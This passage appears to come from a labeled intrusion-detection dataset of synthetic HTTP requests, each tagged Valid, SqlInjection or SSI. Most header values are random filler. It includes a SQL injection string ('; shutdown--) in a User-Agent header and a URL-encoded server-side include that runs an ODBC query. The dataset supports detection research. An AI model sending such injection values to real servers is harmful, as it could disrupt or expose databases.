If-Unmodified-Since: Sun, 27 Dec 09 16:16:48 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 30 Mar 06 09:10:40 GMT
Max-Forwards: 229
MIME-Version: 9.5
Pragma: ztj=pssedr
Proxy-Authorization: vt6o Ret2w3r=bHEdy
Authorization: tp1R sgtao739=Eevn9Dow
Range: 884042-,-6173
Referer: /7trvese/4Eis.mpg
TE: trailers,gzip;q=0.9
Trailer: Proxy-Authorization
User-Agent: rdvRsoeiu9zdty
UA-CPU: MIPS
UA-Disp: 4833,791,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 175x9558
Via: 4.3 66.17.128.65:67139, FTP/8.4 www.tmu6.css, 7.6 145.194.99.196
Transfer-Encoding: gzip
Upgrade: sua0/7.7, pt9do4/4.0
Warning: 135 233.154.149.58:35015 "hpetgNt" 
X-Forwarded-For: 84.25.232.9
X-Serial-Number: 64170789223686
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15231
Start - Id: 35444
class: SqlInjection
POST /bi1zOh/izetao7krp5ieFxr4se/pYstyle7chPqC/Cettetl/cTPMRA6ddRqGDc/dUGrQ.1SXRcN/8y2SgUVvCPd/po.cgi? HTTP/1.0
Content-Length: 19
Content-Language: agyert,iyimAt
Content-Encoding: compress
Content-Location: http://2htrxj.be/HIpoie5/inyhdo2/gnA2lur/rR8roett/lagtt.sh
Content-MD5: cXNuaXJuZWJMZGRObkNpNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Apr 04 06:44:19 GMT
Last-Modified: Tue, 12 Oct 04 16:54:49 GMT
Host: www.iEArti.gov
Connection: keep-alive
Accept: video/*, application/*;q=0.7
Accept-Charset: x-mac-greek, cp-932
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: e=eb
Client-ip: 124.241.147.173
Cookie: IPwhere@=lrceT7p;vRonmoetTynwezs=openn'ibmtpd~&usrt t0
Cookie2: $Version="688"
Date: Sat, 27 Sep 08 12:59:04 UTC
ETag: W/"3WyXuZoccMKzD-C"
Expect: yeewi
From: timw@ite3sq.fr
If-Modified-Since: Sat, 24 Jul 04 24:42:34 GMT
If-Unmodified-Since: Thu, 05 Feb 04 24:03:40 CET
If-Match: "n3BD_RpvCjjYl@H5I2"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 3.0
Pragma: no-cache
Authorization: Basic b3ZnY2hpZWQ6cm9XNzAz
Referer: /maiei.mp3
User-Agent: '; shutdown--
UA-OS: Windows 95
Via: 0.7 www.o5ie.tiff, FTP/3.1 www.5jIol.shtml, 0.8 www.dkfN.js
Transfer-Encoding: gzip
Warning: 040 www.aads.shtml "Lmnotfsuaiytt" "Wed, 10 Jun 09 05:28:12 CET"
X-Forwarded-For: 252.21.227.56
X-Serial-Number: 8980976
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

OrHefovusklpho=2lt4

End - Id: 35444
Start - Id: 40911
class: SSI
GET /s1tejma9eT1Sqcp4/arnnearpa/s2I4VUfAm2/uqSbDKAwQ2hx/uRRtaBZh5cj/eii35eTiii3rni9ehnan/eRtvJ62RRxJ/aeZv/mrCR7xTNAlLZ.asmx?w2srryCr=%3C%21--++++%23odbc+++++connect%3D%22eaqutiy%2Ctu%2Ceya%22++++statement%3D%22select+++*+++from+++7r%22--%3E&zcT47RGMKfU=dPVI1iNkbko HTTP/1.1
Host: 54.65.60.68
Connection: keep-alive
Accept: video/*, text/*
Accept-Charset: x-mac-chinesesimp;q=0.9, windows-1253
Accept-Encoding: 
Accept-Language: jr2eaa-tte, Un5eet7-ve;q=0.7
Cache-Control: only-if-cached
Client-ip: 71.125.45.144
Cookie: 5NxwtSwvresd=hir;oyTo5rcoEegSiet=aasaelhA3hQn;uebuebsNtu7s=MtW3from;ml9=eeteten
Cookie2: $Version="3"
Date: Wed, 12 Nov 08 20:11:53 UTC
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: 100-continue
From: 7tnz7e@rrkue5aod.it
If-Modified-Since: Wed, 20 Jul 05 09:15:09 CET
If-Unmodified-Since: Tue, 25 Oct 05 17:11:15 CET
If-Match: *
If-None-Match: "XstJE9ZCTYnVm_eI"
If-Range: *
Max-Forwards: 2043
MIME-Version: 7.3
Pragma: rdtrc='tnsz'
Authorization: NTLM ajlpaENFYU9iZTB0bmFZYmVoeWlhb2ZCbzJmbnRyaTVteGw2b3JyNW1yQXBsbjg=
Range: -0350,3542-,-6
Referer: /ohinzc7/i34ginio.asmx
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.3 (Windows; U; Win98 2.8; dU-T0; rv:7.1.7) Gecko/37783486
UA-CPU: MIPS
UA-OS: Windows 95
UA-Color: color32
Via: 5.5 134.245.36.38, asay/6.6 223.189.100.48
Transfer-Encoding: gzip
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 175.203.115.62
X-Serial-Number: 163741114628927
----: ------------------

null

End - Id: 40911
Start - Id: 24351
class: Valid
GET /bqlnewgHztetdtmwadgm/ncknanp/r2doyrxa0a.js? HTTP/1.1
Host: 65.221.121.246
Connection: close
Accept: application/x-tar, image/png;q=0.7, audio/x-wav;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, gzip;q=0.9
Accept-Language: trg-akH5LhiW, yuath-a5d, e0clR-euEd
Cache-Control: max-stale=5
Client-ip: 114.108.65.238
Cookie: ioysad7nh=yh;s4yb=libos~eu;CTtoeeit9l8i=mOlfiorCiaeehoo;Ten9eeoha=%nt6;let6hnottthe=411060
Cookie2: $Version="7"
Date: Wed, 21 Apr 10 12:38:04 UTC
ETag: W/"pYB3-rPESnijxR4g"
Expect: 100-continue
From: 5hRu@STpwssetis.be
If-Modified-Since: Mon, 13 Oct 08 19:01:16 UTC
If-Unmodified-Since: Thu, 15 Jul 04 02:30:52 GMT
If-Match: "RuNHC@wzTGCZV_n88"
If-None-Match: "rHDPYDzEewo0YBdcDMx"
If-Range: Sun, 28 Mar 10 20:11:59 UTC
Max-Forwards: 01
MIME-Version: 5.2
Pragma: emO=t0de
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: NTLM dU9yMWRmeDB3dGV0MHNSd2JsRGR0aTJodklvRWVubzduZw==
Range: -290,922508-,-602
Referer: /ajit/sz3w/fomst.tar.gz
TE: deflate,gzip;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/3.7 (X11; U; Open BSD i386 4.3; ia-s6; rv:1.7.6) Gecko/13139190
UA-CPU: Sparc
UA-Disp: 801,8735,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 352x5203
Via: 5.0 177.159.8.102
Transfer-Encoding: identity
Upgrade: Hiu/7.2, tsosIp/1.1, 2cq/2.4, jea8Dd/0.5
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24351
Start - Id: 24676
class: Valid
GET /eCi/eZBr/hF47ifv/@EXQuEBupdate/ileaime/ardoljr1rnttSh/ittfRn/NeaFatlsr.html?4vX.Pservices=AooSoGTzOj8+&snvoumiOlo=s0&d4ng=o3AH4&hl=tnph-&dpehosObhigyr=U++uh+nme&K1fromE7HselectsGimg=517&rEetHe9adi3=w1w&bh=djCHbEaP73DF&auriaTajuen6n2=enm+%24l&olDnEc2ueiSes=nps+rz9ehanullwinnt&AstdinGlocationD.SgF.M=ecwgetei%25ew%24&teusoosoAe=83300457 HTTP/1.0
Host: www.daec.it
Connection: keep-alive
Accept: text/*, video/*, audio/basic
Accept-Charset: *
Accept-Encoding: identity;q=0.7, compress, deflate;q=0.0, deflate;q=0.6
Accept-Language: ewsho-keefe, asiaOd-8hL
Cache-Control: kvm4ue=rc
Client-ip: 86.24.145.117
Cookie: Es2iiesP0yhe= mfte;fue=x@J_;kgitttS=2622369;ic=y/e@w\oDseR:=rwmno0aa;vo7bqnrlehtyon=83;iB.aE-=Doscag
Cookie2: $Version="77"
Date: Wed, 08 Nov 06 08:25:13 CET
ETag: "UUtSeN9LUVPQfT3E"
Expect: u5o62at
From: tloo@08oaacota.gov
If-Modified-Since: Tue, 22 Jul 08 11:47:41 GMT
If-Unmodified-Since: Tue, 27 Apr 04 16:43:06 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: td8an alxirMec=Lrinqcna
Authorization: Ulerl tpdert=str7o
Range: 1773-,147343-45947,-7279
Referer: /saUasMsy.pdf
TE: deflate;q=0.1,trailers
Trailer: If-Match
User-Agent: t_HCPWy-b3 http://www.i7tehuwc.gov
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 089x5784
Via: 0.0 www.tytitee.shtml, 2.7 61.204.122.193, 6.1 www.edxtte.tiff
Transfer-Encoding: ndnmm; vhltHu=sodneylY
Upgrade: eew3/9.6
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 248.154.151.220
X-Serial-Number: 05865096
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24676
Start - Id: 30217
class: Valid
GET /t.FBc_tqExaa_/mlrT8i8WFdc@VM/mj6yRlW.napH0dmFS0yV/SqU/sVF6.Zh0JHEFx/0acceptoiHUfrOBywF/eaE/eeoivnbreP7pyhF/Ek.-eOBcZlG/JF@oiframePQEC/enypnz2henOsh/hr8aYieahszsi.css?0ee0pec=riipnoe5tphtaccesn2&amP=mi&fnno3desenc9uC=ep&ltcrydscdssEpD2=fud%7C%3Atrl9t0Sj&bpmkeMHsiRNl=imer0ibaDg&EmdM4PrmZkO=aW27cqhl&h0a38MT=iAlike&it6nhteS1letd=29&en=eaarp&setniheeHto=sRouf&eNnNi8oesRban=ney&connectChJDXGeR0=qh7Ene HTTP/1.1
Host: www.Deedfe.cz
Connection: keep-alive
Accept: image/jpeg;q=0.8, video/mpeg, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: hscettnh-ND8hlt3n
Cache-Control: only-if-cached
Client-ip: 59.250.255.66
Cookie: 3DKd=1606338;nsasbi=0049260844;eopTer3ods=yoEae3;0?h<@ex/wp-a f
Cookie2: $Version="709"
Date: Tue, 24 Feb 04 21:44:47 GMT
ETag: W/"GmsUi8tlrlwJp5@w"
Expect: 100-continue
From: ud3orBc@aher6.cz
If-Modified-Since: Fri, 18 Apr 08 06:56:45 CET
If-Unmodified-Since: Mon, 26 Jun 06 10:29:10 UTC
If-Match: *
If-None-Match: *
If-Range: "qpArCk6AWiMMAnE@j_"
Max-Forwards: 3
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: cauv rfTcyhia=lorfye
Authorization: NTLM c2VkbnlhdWV1b21hdzF5YmlzbGZyeXZlaWVhOWlmVHdseGxlb216Mzk=
Range: 346642-698,469-394,8-
Referer: /oewJp/1et3snor/tmaM/iihro.cfm
TE: trailers
Trailer: Authorization
User-Agent: H6spu (tHT9WGni; eck4Xr; cO-LtPcGyB; 5s4P-g@6)
UA-CPU: PowerPC
UA-Disp: 058,5611,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8300x7095
Via: 2.3 www.itesbX.gif, h5pmfa/5.1 www.3ae8eoOr.jpeg
Transfer-Encoding: Ai64ad; OHa1=mmijeoT
Upgrade: eftf/4.4, ddnAte/3.1
Warning: 579 185.81.167.241 "3i0d" "Wed, 17 Jan 07 24:46:17 CET"
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 19194011026
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30217
Start - Id: 26595
class: Valid
GET /-snRXHQWx_/m917T-Gdk7kxYR/per1eihretTusm/siuhl3sfeesO5/8dese/bte/tDi/f6wDwyil/nce4lpbd6epsm8bPl.nsf?3Mec=3&hafe3lawl4npbe=hba7eejwh%40q&ydd0anouaneulva=q7Uoonsep&LUdtesEsia=397950&Sascr=97098529 HTTP/1.0
Host: www.seriH.org
Connection: close
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: h=6h
Client-ip: 228.234.165.65
Cookie: Eet1ut=8cQHXsj.2m;vQrcgr=27;Ac=eetcj?xp;C-Y1=228521;Fkneuat2imr=a@
Cookie2: $Version="720"
Date: Tue, 05 Oct 04 24:14:51 CET
ETag: W/"oTArCAOdK_hJSEWM3kO"
Expect: 100-continue
From: aucneam2@riewaCaudy.st
If-Modified-Since: Tue, 29 Jul 08 06:26:45 GMT
If-Unmodified-Since: Wed, 21 Jul 04 06:06:52 UTC
If-Match: *
If-None-Match: *
If-Range: "F0t8SeDR2flec8nUf"
Max-Forwards: 6
MIME-Version: 2.5
Pragma: lcih=c6
Proxy-Authorization: Basic ZWFzcmZUczY6YmlkaXc=
Authorization: Basic dHhJbmFNOmNobm9EMw==
Range: 12361-,4-
Referer: http://1ePpet04.org/lnkanu1a/uQeeldp/eehx/wEfMlCmo/hi6f.asmx
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.6 (Machintosh; U; PPC 6.2; Fe-tt; rv:5.8.1) Gecko/86435951
UA-CPU: Sparc
UA-Disp: 7024,486,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 335x343
Via: 5.0 www.leettr.png, HTTP/2.7 174.5.96.178
Transfer-Encoding: tnpon
Upgrade: zIHnm/4.6, I4l/5.6, hae/9.1, cflau/8.1
Warning: 846 14.21.113.100 "fyetrt" 
X-Forwarded-For: 220.222.195.180
X-Serial-Number: 693373977262
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26595
Start - Id: 6814
class: Valid
PUT /yIy5ZB@1V.htm? HTTP/1.1
Content-Length: 238
Content-Language: itetp,3se9ss
Content-Encoding: compress
Content-Location: http://www.duiannht.cz/s9itrax/rUeqn.zip
Content-MD5: aW93MmpuYzk2Z3llZWhlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Feb 08 03:50:37 CET
Last-Modified: Thu, 30 Dec 04 03:41:31 GMT
Host: www.9a7y7t.ch:75139
Connection: keep-alive
Accept: audio/*;q=0.3, image/gif;q=0.0
Accept-Charset: windows-1251, windows-1250, windows-1251;q=0.4, utf-8, euc-cn
Accept-Encoding: deflate;q=0.9, gzip;q=0.9, identity;q=0.7, compress;q=0.4
Accept-Language: an87em-Iro5, fovil2ai-e2EoUec, hi-legtm, sc-b8jdqOb
Cache-Control: no-transform
Client-ip: 117.227.125.202
Cookie: ud1ea=0644870;lIyedtftml=mczvT2avjnnhttps;2r3kds3snOuicn=964;rdeo3eeUarn9nhe=2246667;tublrk==er%1
Cookie2: $Version="777"
Date: Fri, 09 Jul 04 14:11:25 UTC
ETag: "6IQTiKF6yakEidUc4sf"
Expect: ode2tbm
From: n7hf@Nessscta.com
If-Modified-Since: Thu, 27 Jan 05 15:03:34 CET
If-Unmodified-Since: Mon, 31 Oct 05 16:26:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 249
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic U2VlcHNzdFg6aXJkdG9z
Authorization: NTLM bGRhZXVvbnRna2Vib2hOcTk5d2ZydG9sbmlsdHd0b2xsZGplaXRoaVI=
Range: 75-484,-76,208013-709
Referer: /b7r5higo/riorO.png
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: eedjamEr/7.4.4
UA-CPU: 68000
UA-Disp: 408,046,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 728x570
Via: 2.4 www.ieinc.shtml, 8.5 69.23.170.192
Transfer-Encoding: compress
Upgrade: oje/5.1
Warning: 797 59.247.222.32 "dfucaar" 
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 89698
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

ett1io3sHnisr=9&l4de=424&owtObwrDzHa=6&iLIje_RYj4A=75270180&httpfromPMBtqnmS=4&03faoSeohuie=qar9ioeenek&neYp0ueete2niei=oJsq8xhT&7nejnW9awm5nged=94&yf86edy=5872&ll= b&SreexuRpboaeo=4&kaie4adcnweco=tunionvEn his ]obin aa s&wt8r0eo=plbgst

End - Id: 6814
Start - Id: 8487
class: Valid
GET /locnriyOR.wr/tAk.00ip4WSvu216sMSr/mstaio/lj1a/en/r8amBopenrd4D14/mLoysYitmlORmtu8ctb/8mTtkdo/lisOltloatfolncp.tiff?ymwcatmV3sn=sitkS_&5atgsjhp=sen HTTP/1.0
Host: www.tottl.org
Connection: close
Accept: audio/basic
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: identity, deflate, identity
Accept-Language: iobeo-en;q=0.1
Cache-Control: no-store
Client-ip: 251.138.184.9
Cookie: 1SademEhsf4t=ttclikee )a&vecat;tea=64137;hwmgor09=5r0 nph-?eonOmhah;yltnnhiod=rIp@pujwoNyC
Cookie2: $Version="031"
Date: Wed, 26 Apr 06 19:29:09 CET
ETag: "x-0vskwvvt.CtBrpiL@m"
Expect: 100-continue
From: uifIa@nthr.st
If-Modified-Since: Sun, 28 Mar 04 10:58:31 GMT
If-Unmodified-Since: Fri, 12 May 06 15:06:28 GMT
If-Match: "wE@id2pNHQGRV34A"
If-None-Match: "jr9xIrDD8yr6znkY5C"
If-Range: *
Max-Forwards: 4147
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZWRpdWVxaWE6Nmxvb2k=
Authorization: NTLM d2VwMExobGV5dGV1dGR0dGplYTduQ2hvZUh0aGpoMG9Yc2VhbnJUaGlsUg==
Range: 322-,-412,-5293
Referer: /LcqwtF/nSee/n7oSrctu/l3eaotnt.jpeg
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.9 (Windows; U; Windows NT 5.4; 6s-nr; rv:3.4.7) Gecko/24150687
UA-CPU: 68000
UA-Disp: 8051,5811,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 603x7957
Via: 6.7 40.38.56.217
Transfer-Encoding: deflate
Upgrade: oeims/3.9, lTs/0.8
Warning: 805 175.134.153.77 "osh8theeinddak0l" 
X-Forwarded-For: 15.12.43.118
X-Serial-Number: 116122935
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8487
Start - Id: 6095
class: Valid
PUT /es_./hlN1xsI4Gw-EhO/pVBhW/nxzZuqa/8maotTCoibla07nT6d/aDg7GZ29wHzi/aMcMnQLnVA76c@sRnGz/06kpUF7_l-1ct3/r8sEr0caosxjMntjic5/p_V2qlgqX_X4v-ArT/tste5tvesgecndolwa/AroJa.htm? HTTP/1.0
Content-Length: 218
Content-Language: aesodt,srm8oh
Content-Encoding: identity
Content-Location: /ld8C.jpeg
Content-MD5: aDRicGJvb2Ezc3lvbmVvbg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jul 04 16:29:43 CET
Last-Modified: Wed, 22 Dec 04 17:40:09 GMT
Host: 55.185.240.15
Connection: c4ei
Accept: image/*;q=0.0
Accept-Charset: iso-8859-8-i;q=0.5
Accept-Encoding: 
Accept-Language: Th-cnlcEOe;q=0.1, eno6eta-tv;q=0.7
Cache-Control: asuiOhuy=we
Client-ip: 39.222.108.79
Cookie: jza=6tt%osLienodem ;cetUdmidn=atnl;di1natT7nSja=8179
Cookie2: $Version="3"
Date: Wed, 21 Apr 10 04:25:33 GMT
ETag: "FyD9jloh6p4Fowm9S"
Expect: 100-continue
From: tihl0ed@vmlev6ye.uk
If-Modified-Since: Thu, 29 Sep 05 18:36:59 CET
If-Unmodified-Since: Thu, 06 Sep 07 24:48:25 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Feb 07 21:56:19 UTC
Max-Forwards: 3
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic eTV0czM6dGR0c2I=
Range: 32908-897936,302-48186
Referer: /1tAzaO/xpsiNeR/rlow/r6dstn2a/oka9shp.swf
TE: trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.1 (compatible; MSIE 1.3; WinNT; itat0rWW)
UA-CPU: StrongARM
UA-Disp: 381,9388,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 179x0676
Via: HTTP/0.0 www.leoSRy.gif, 7.6 36.245.210.61, 9.8 83.80.151.22:8129
Transfer-Encoding: identity
Upgrade: qdoi/7.1, etiX/1.2, Sor/4.3, ex2/0.1
Warning: 696 www.rlonIm7H.jpg "dt7r" "Wed, 17 Mar 04 18:58:49 GMT"
X-Forwarded-For: 224.40.113.11
X-Serial-Number: 124878
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rafneisi=aevaloe3sn>&0imwn9np=8055&eysXmrdbih=aazksesb9~&htner=67&nrhvLtpo5Tpsa=2545998&oueahln=h$|n&tsw&nETlltafamheet=deso'fet5iebrn&aU0dBv_201gpk=6sndgteSie&m3u=7839&HtmCG91iA=45876&ItHZHg.A8=fcaokZnyeiG

End - Id: 6095
Start - Id: 8755
class: Valid
GET /L9oTcwget.wD@KKP/ydseSi/dptcq.mdb? HTTP/1.0
Host: 221.217.137.64
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.1, iso-8859-2
Accept-Encoding: *
Accept-Language: iyci-hretpb;q=0.1
Cache-Control: min-fresh=47
Client-ip: 78.108.222.182
Cookie: AouFts=7e8nr;rof2rhcrsu67=enzeeval;MzKrI_.=43;tte1t7rnoiodaa=oT6;rSuhrqei= tei;u4dN=inWPad
Cookie2: $Version="149"
Date: Tue, 28 Mar 06 04:45:57 CET
ETag: W/"qeLyEBcfbxS4Nls9aX.N"
Expect: Sseo3
From: NlasAm@fqwm.fr
If-Modified-Since: Fri, 27 Jun 08 01:30:31 GMT
If-Unmodified-Since: Sun, 02 Apr 06 22:52:21 CET
If-Match: *
If-None-Match: "RxYaZdNjliFUVfwfBp0"
If-Range: Mon, 13 Jul 09 02:23:36 GMT
Max-Forwards: 15
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: twi2ig maenlana=he6iSwdI
Authorization: 5teHC gqnees=rvefogr
Range: -914608,-7
Referer: http://6bcnAI.cz/8Een/eduet/6Dhdsnnj.doc
TE: chunked;q=0.7
Trailer: TE
User-Agent: dfoCreG@ http://www.sHf7m2ea.uk
UA-CPU: PowerPC
UA-Disp: 1778,825,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3952x6692
Via: 6.3 www.spa2DE.htm, 8.2 www.coui.tiff, 8.7 245.187.16.69
Transfer-Encoding: deflate
Upgrade: mam8/3.4, rsrjc/4.4, wny/0.2, dstes/8.2, ehankd/6.8
Warning: 642 69.235.0.195:2770 "RaqtwI1" "Tue, 27 Jul 04 11:32:37 GMT"
X-Forwarded-For: 208.34.96.72
X-Serial-Number: 14852095010495286519
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8755
Start - Id: 9183
class: Valid
GET /dY7T.v4D7U/szD/sristnlohqneoe/27HBw0j/ITadminbodyUfAVjt/tFe5qThZObSpFE4Jm/9etomAoof0dmgashu.php3?ywe=hthaLjehes4TkeEtpi&sBJwe=lcni&aaoaiatopsoirgn=80498627 HTTP/1.1
Host: www.oinm.be
Connection: close
Accept: audio/*, text/*
Accept-Charset: isiri-3342;q=0.9, ks_c_5601-1987;q=0.5
Accept-Encoding: deflate, identity;q=0.3, deflate
Accept-Language: ttArA4t-i;q=0.9, teiag-rlHwiTe, laah-itl;q=0.7, AiD-lr, eays-8rR9
Cache-Control: no-store
Client-ip: 77.58.247.61
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="730"
Date: Thu, 12 Jan 06 18:32:16 UTC
ETag: "MpU6cr5hO77EN__ij@0y"
Expect: laeeo
From: egrds@churmi.org
If-Modified-Since: Sat, 31 Dec 05 20:21:03 CET
If-Unmodified-Since: Mon, 31 Dec 07 19:54:42 CET
If-Match: "clrb0_T_ndr7zND1ufh"
If-None-Match: "aDZu2d-sEMyhzcQRa"
If-Range: Tue, 23 Oct 07 17:12:22 GMT
Max-Forwards: 9
MIME-Version: 8.7
Pragma: zarsirr=taNws
Proxy-Authorization: NTLM bmRlZ3JoZmEzbmlQZ29kSWJOb25ydDFvb1VubjZlOHJk
Authorization: Basic c2V0NzNlZWw6b2VlMDJlcQ==
Range: 57164-,9027-962000
Referer: http://s9an.com/mhgeEtwd/erdma.mspx
TE: trailers
Trailer: Range
User-Agent: dlae/8.5.2
UA-CPU: StrongARM
UA-Disp: 226,033,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3033x117
Via: gij/2.9 14.85.40.200, 7.3 www.oMf8.htm, aecrge/7.8 180.184.231.75:45
Transfer-Encoding: compress
Upgrade: eew/0.7, rimtsu/2.3
Warning: 029 www.rgnrlhe.js "hetef0djrse" "Sun, 29 Aug 04 17:38:57 GMT"
X-Forwarded-For: 146.140.80.245
X-Serial-Number: 51512121332021601
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9183
Start - Id: 24537
class: Valid
GET /wRB6HL/eguicneWrreeqat/fiX1rSunMwVqxYUpRj6f/pQkB/4v/jnsUc7log3O5X84.png?rNsr=5978&sOelieoltAyee=e+Tkbej%26idhebsae HTTP/1.1
Host: www.n3arh.de
Connection: close
Accept: video/quicktime
Accept-Charset: windows-1258;q=0.9, x-mac-korean;q=0.2
Accept-Encoding: *
Accept-Language: d-g;q=0.9, 3n5n3ci-g;q=0.2, itry-udaNesr;q=0.9, nicpN-a6PoRra;q=0.4, ah-d
Cache-Control: no-cache
Client-ip: 218.219.114.119
Cookie: hfnn=22;roi=265166
Cookie2: $Version="2"
Date: Wed, 29 Apr 09 21:20:36 CET
ETag: "._ul5xhRjdHnXZPTXn"
Expect: fohhaql
From: leyen9ll@dgyc.uk
If-Modified-Since: Mon, 08 Jun 09 18:41:51 GMT
If-Unmodified-Since: Tue, 24 Jun 08 11:29:59 UTC
If-Match: *
If-None-Match: "@UhoEYKLqxy2GiYLd"
If-Range: Thu, 28 Dec 06 13:28:44 UTC
Max-Forwards: 19
MIME-Version: 1.2
Pragma: ul=doeep
Proxy-Authorization: oser ouj1qmso=rgfwv
Authorization: Basic aHRvZWRjOmNlaGdhaQ==
Range: -001651,-8
Referer: http://bhaE.net/cohwii/tIduu/nIwalxal/0ipek/E37fe.css
TE: trailers,chunked;q=0.2
Trailer: If-Modified-Since
User-Agent: Mozilla/6.6 (compatible; Konqueror/5.2; Open BSD i586; waeehuh; nOkib; nAg4)
UA-CPU: Sparc
UA-Disp: 1408,616,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 303x667
Via: 5.5 www.gir0p.jpg:848
Transfer-Encoding: compress
Upgrade: prsuot/9.5, stt/6.8
Warning: 778 www.vdoea1nw.tiff "Hneestdd4eEZes" "Sun, 13 May 07 18:35:12 UTC"
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24537
Start - Id: 7872
class: Valid
POST /96rx4nq9v/sXqamlmf9N/yXp4UWJOk--0/mvwh/r_Eay7tYJJeXYbuIbqd/iIE4PV/m_j4X4reVp/Ebxeawimsauamc/6l9Ioecatee/blAG0..sh? HTTP/1.0
Content-Length: 90
Content-Language: oa5sahyg,huepn,rrtleari
Content-Encoding: identity
Content-Location: /sptE/oenbu/hhmre/aHrdo/plktu.sh
Content-MD5: bmR0bmFlWlZhYVBmaFRJaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jul 08 18:34:00 CET
Last-Modified: Fri, 06 Apr 07 24:50:28 GMT
Host: www.tt37.ch
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-9
Accept-Encoding: compress, identity, gzip, deflate, deflate
Accept-Language: ms-ln5iaeo
Cache-Control: min-fresh=613
Client-ip: 36.61.64.56
Cookie: boehotybesm=rU;0krtozlyhno3=7206155310;atbcb4=0043587
Cookie2: $Version="163"
Date: Sun, 16 May 04 23:13:04 CET
ETag: "qktc@.Ia@_iWjay"
Expect: 100-continue
From: Oosa@iedncd.ch
If-Modified-Since: Tue, 31 Oct 06 16:58:12 UTC
If-Unmodified-Since: Fri, 07 Dec 07 06:09:13 GMT
If-Match: "P7AQ9aK1nHt7_Yw"
If-None-Match: "0jLQL9EZo2EBSE8aAa7a"
If-Range: Mon, 25 Oct 04 01:29:23 GMT
Max-Forwards: 458
MIME-Version: 5.8
Pragma: r3s8ceeo=5os1yw
Proxy-Authorization: Digest username="wNlbos"
Authorization: Basic cHRpYTpzaThnY2Vh
Range: 3-90,72191-
Referer: /andeezuf/nyqh3t/ttnn13.pdf
TE: trailers,gzip;q=0.0,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.5 (compatible; Fnaalfe; Solaris; t7ei6Tdi; xrirooaeaa; uftr)
UA-CPU: Sparc
UA-Disp: 8149,736,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 078x656
Via: FTP/8.1 www.nQcaneee.htm, 9.9 169.49.93.87
Transfer-Encoding: compress
